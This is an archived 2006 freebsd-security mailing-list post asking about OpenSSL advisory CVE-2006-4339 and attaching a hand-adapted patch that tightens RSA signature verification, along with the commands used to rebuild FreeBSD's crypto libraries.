Date: Tue, 05 Sep 2006 11:56:30 -0400 From: Mike Tancsa <mike@sentex.net> To: freebsd-security@FreeBSD.org Subject: Re: http://www.openssl.org/news/secadv_20060905.txt Message-ID: <7.0.1.0.0.20060905112743.149f17c8@sentex.net> In-Reply-To: <7.0.1.0.0.20060905105253.149db9a8@sentex.net> References: <7.0.1.0.0.20060905105253.149db9a8@sentex.net>
index | next in thread | previous in thread | raw e-mail
[-- Attachment #1 --] At 10:53 AM 9/5/2006, Mike Tancsa wrote: >Does anyone know the practicality of this attack ? i.e. is this >trivial to do ? Also, for RELENG_6, can someone confirm the patch referenced in http://www.openssl.org/news/patch-CVE-2006-4339.txt be applied with the one change of +{ERR_REASON(RSA_R_PKCS1_PADDING_TOO_SHORT),"pkcs1 padding too short"}, to +{RSA_R_PKCS1_PADDING_TOO_SHORT,"pkcs1 padding too short"}, I manually added in the diffs and everything seems to compile and function with some limited testing. I did cd /usr/src/crypton/openssl/crypto/rsa patch < p cd /usr/src/secure make clean make obj make depend make includes make make install > ---Mike > >-------------------------------------------------------------------- >Mike Tancsa, tel +1 519 651 3400 >Sentex Communications, mike@sentex.net >Providing Internet since 1994 www.sentex.net >Cambridge, Ontario Canada www.sentex.net/mike > >_______________________________________________ >freebsd-security@freebsd.org mailing list >http://lists.freebsd.org/mailman/listinfo/freebsd-security >To unsubscribe, send any mail to "freebsd-security-unsubscribe@freebsd.org" [-- Attachment #2 --] *** rsa.h.old Fri Feb 25 00:49:43 2005 --- rsa.h Tue Sep 5 11:35:10 2006 *************** *** 352,357 **** --- 352,358 ---- #define RSA_R_N_DOES_NOT_EQUAL_P_Q 127 #define RSA_R_OAEP_DECODING_ERROR 121 #define RSA_R_PADDING_CHECK_FAILED 114 + #define RSA_R_PKCS1_PADDING_TOO_SHORT 105 #define RSA_R_P_NOT_PRIME 128 #define RSA_R_Q_NOT_PRIME 129 #define RSA_R_RSA_OPERATIONS_NOT_SUPPORTED 130 *** rsa_eay.c.old Tue Sep 5 11:34:50 2006 --- rsa_eay.c Tue Sep 5 11:36:00 2006 *************** *** 569,574 **** --- 569,584 ---- { case RSA_PKCS1_PADDING: r=RSA_padding_check_PKCS1_type_1(to,num,buf,i,num); + /* Generally signatures should be at least 2/3 padding, though + this isn't possible for really short keys and some standard + signature schemes, so don't check if the unpadded data is + small. */ + if(r > 42 && 3*8*r >= BN_num_bits(rsa->n)) + { + RSAerr(RSA_F_RSA_EAY_PUBLIC_DECRYPT, RSA_R_PKCS1_PADDING_TOO_SHORT); + goto err; + } + break; case RSA_NO_PADDING: r=RSA_padding_check_none(to,num,buf,i,num); *** rsa_err.c.old Tue Sep 5 11:36:09 2006 --- rsa_err.c Tue Sep 5 11:36:39 2006 *************** *** 120,125 **** --- 120,126 ---- {RSA_R_N_DOES_NOT_EQUAL_P_Q ,"n does not equal p q"}, {RSA_R_OAEP_DECODING_ERROR ,"oaep decoding error"}, {RSA_R_PADDING_CHECK_FAILED ,"padding check failed"}, + {RSA_R_PKCS1_PADDING_TOO_SHORT ,"pkcs1 padding too short"}, {RSA_R_P_NOT_PRIME ,"p not prime"}, {RSA_R_Q_NOT_PRIME ,"q not prime"}, {RSA_R_RSA_OPERATIONS_NOT_SUPPORTED ,"rsa operations not supported"}, *** rsa_sign.c.old Wed Oct 1 08:32:39 2003 --- rsa_sign.c Tue Sep 5 11:37:29 2006 *************** *** 185,190 **** --- 185,208 ---- sig=d2i_X509_SIG(NULL,&p,(long)i); if (sig == NULL) goto err; + + /* Excess data can be used to create forgeries */ + if(p != s+i) + { + RSAerr(RSA_F_RSA_VERIFY,RSA_R_BAD_SIGNATURE); + goto err; + } + + /* Parameters to the signature algorithm can also be used to + create forgeries */ + if(sig->algor->parameter + && ASN1_TYPE_get(sig->algor->parameter) != V_ASN1_NULL) + { + RSAerr(RSA_F_RSA_VERIFY,RSA_R_BAD_SIGNATURE); + goto err; + } + + sigtype=OBJ_obj2nid(sig->algor->algorithm);help
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?7.0.1.0.0.20060905112743.149f17c8>